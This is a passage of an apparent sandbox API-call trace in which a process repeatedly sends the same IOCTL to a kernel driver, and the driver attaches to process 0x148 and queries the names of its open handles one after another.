(in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.677] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.677] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.677] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.677] PsAcquireProcessExitSynchronization () returned 0x0 [0243.677] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.677] ObReferenceObjectByHandle (in: Handle=0x350, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00196efc0, HandleInformation=0x0) returned 0x0 [0243.677] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.677] PsReleaseProcessExitSynchronization () returned 0x2 [0243.677] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.677] ObQueryNameString (in: Object=0xfffff8a00196efc0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.677] ObfDereferenceObject (Object=0xfffff8a00196efc0) returned 0x1 [0243.677] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.677] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.677] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.677] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.677] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.677] PsAcquireProcessExitSynchronization () returned 0x0 [0243.677] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.677] ObReferenceObjectByHandle (in: Handle=0x390, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0010366b0, HandleInformation=0x0) returned 0x0 [0243.677] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.677] PsReleaseProcessExitSynchronization () returned 0x2 [0243.677] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.677] ObQueryNameString (in: Object=0xfffff8a0010366b0, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.678] ObfDereferenceObject (Object=0xfffff8a0010366b0) returned 0x1 [0243.678] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.678] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.678] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.678] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.678] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.678] PsAcquireProcessExitSynchronization () returned 0x0 [0243.678] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.678] ObReferenceObjectByHandle (in: Handle=0x3a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00103ebc0, HandleInformation=0x0) returned 0x0 [0243.678] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.678] PsReleaseProcessExitSynchronization () returned 0x2 [0243.678] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.678] ObQueryNameString (in: Object=0xfffff8a00103ebc0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.678] ObfDereferenceObject (Object=0xfffff8a00103ebc0) returned 0x1 [0243.678] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.678] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.678] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.678] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.678] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.678] PsAcquireProcessExitSynchronization () returned 0x0 [0243.678] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.678] ObReferenceObjectByHandle (in: Handle=0x3c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0030459f0, HandleInformation=0x0) returned 0x0 [0243.678] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.678] PsReleaseProcessExitSynchronization () returned 0x2 [0243.678] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.679] ObQueryNameString (in: Object=0xfffff8a0030459f0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.679] ObfDereferenceObject (Object=0xfffff8a0030459f0) returned 0x1 [0243.679] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.679] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.679] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.679] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.679] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.679] PsAcquireProcessExitSynchronization () returned 0x0 [0243.679] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.679] ObReferenceObjectByHandle (in: Handle=0x3f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00000aa70, HandleInformation=0x0) returned 0x0 [0243.679] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.679] PsReleaseProcessExitSynchronization () returned 0x2 [0243.679] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.679] ObQueryNameString (in: Object=0xfffff8a00000aa70, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.679] ObfDereferenceObject (Object=0xfffff8a00000aa70) returned 0x1 [0243.679] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.679] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.679] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.679] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.679] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.679] PsAcquireProcessExitSynchronization () returned 0x0 [0243.679] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.679] ObReferenceObjectByHandle (in: Handle=0x474, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00138cf40, HandleInformation=0x0) returned 0x0 [0243.680] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.680] PsReleaseProcessExitSynchronization () returned 0x2 [0243.680] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.680] ObQueryNameString (in: Object=0xfffff8a00138cf40, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.680] ObfDereferenceObject (Object=0xfffff8a00138cf40) returned 0x1 [0243.680] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.680] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.680] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.680] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.680] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.680] PsAcquireProcessExitSynchronization () returned 0x0 [0243.680] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.680] ObReferenceObjectByHandle (in: Handle=0x48c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00128d4f0, HandleInformation=0x0) returned 0x0 [0243.680] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.680] PsReleaseProcessExitSynchronization () returned 0x2 [0243.680] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.680] ObQueryNameString (in: Object=0xfffff8a00128d4f0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.680] ObfDereferenceObject (Object=0xfffff8a00128d4f0) returned 0x1 [0243.680] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.680] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.680] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.680] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.680] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.680] PsAcquireProcessExitSynchronization () returned 0x0 [0243.681] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.681] ObReferenceObjectByHandle (in: Handle=0x4cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00146d0f0, HandleInformation=0x0) returned 0x0 [0243.681] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.681] PsReleaseProcessExitSynchronization () returned 0x2 [0243.681] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.681] ObQueryNameString (in: Object=0xfffff8a00146d0f0, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.681] ObfDereferenceObject (Object=0xfffff8a00146d0f0) returned 0x1 [0243.681] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.681] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.681] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.681] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.681] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.681] PsAcquireProcessExitSynchronization () returned 0x0 [0243.681] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.681] ObReferenceObjectByHandle (in: Handle=0x4d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0017b23b0, HandleInformation=0x0) returned 0x0 [0243.681] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.681] PsReleaseProcessExitSynchronization () returned 0x2 [0243.681] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.681] ObQueryNameString (in: Object=0xfffff8a0017b23b0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.681] ObfDereferenceObject (Object=0xfffff8a0017b23b0) returned 0x1 [0243.681] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.681] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.681] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.681] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.682] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.682] PsAcquireProcessExitSynchronization () returned 0x0 [0243.682] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.682] ObReferenceObjectByHandle (in: Handle=0x4dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001b4f800, HandleInformation=0x0) returned 0x0 [0243.682] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.682] PsReleaseProcessExitSynchronization () returned 0x2 [0243.682] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.682] ObQueryNameString (in: Object=0xfffff8a001b4f800, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.682] ObfDereferenceObject (Object=0xfffff8a001b4f800) returned 0x1 [0243.682] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.682] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.682] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.682] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.682] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.682] PsAcquireProcessExitSynchronization () returned 0x0 [0243.682] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.682] ObReferenceObjectByHandle (in: Handle=0x4e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001b25640, HandleInformation=0x0) returned 0x0 [0243.682] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.682] PsReleaseProcessExitSynchronization () returned 0x2 [0243.682] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.682] ObQueryNameString (in: Object=0xfffff8a001b25640, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.682] ObfDereferenceObject (Object=0xfffff8a001b25640) returned 0x1 [0243.682] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.682] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.682] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.682] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.683] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.683] PsAcquireProcessExitSynchronization () returned 0x0 [0243.683] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.683] ObReferenceObjectByHandle (in: Handle=0x4f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001b31af0, HandleInformation=0x0) returned 0x0 [0243.683] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.683] PsReleaseProcessExitSynchronization () returned 0x2 [0243.683] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.683] ObQueryNameString (in: Object=0xfffff8a001b31af0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.683] ObfDereferenceObject (Object=0xfffff8a001b31af0) returned 0x1 [0243.683] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.683] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.683] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.683] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.683] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.683] PsAcquireProcessExitSynchronization () returned 0x0 [0243.683] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.683] ObReferenceObjectByHandle (in: Handle=0x504, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001b26f30, HandleInformation=0x0) returned 0x0 [0243.683] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.683] PsReleaseProcessExitSynchronization () returned 0x2 [0243.683] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.683] ObQueryNameString (in: Object=0xfffff8a001b26f30, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.683] ObfDereferenceObject (Object=0xfffff8a001b26f30) returned 0x1 [0243.683] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.684] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.684] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.684] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.684] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.684] PsAcquireProcessExitSynchronization () returned 0x0 [0243.684] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.684] ObReferenceObjectByHandle (in: Handle=0x50c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001bade00, HandleInformation=0x0) returned 0x0 [0243.684] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.684] PsReleaseProcessExitSynchronization () returned 0x2 [0243.684] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.684] ObQueryNameString (in: Object=0xfffff8a001bade00, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.684] ObfDereferenceObject (Object=0xfffff8a001bade00) returned 0x1 [0243.684] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.684] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.684] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.684] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.684] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.684] PsAcquireProcessExitSynchronization () returned 0x0 [0243.684] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.684] ObReferenceObjectByHandle (in: Handle=0x510, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001bde8a0, HandleInformation=0x0) returned 0x0 [0243.685] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.685] PsReleaseProcessExitSynchronization () returned 0x2 [0243.685] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.685] ObQueryNameString (in: Object=0xfffff8a001bde8a0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.685] ObfDereferenceObject (Object=0xfffff8a001bde8a0) returned 0x1 [0243.685] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.685] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.685] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.685] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, 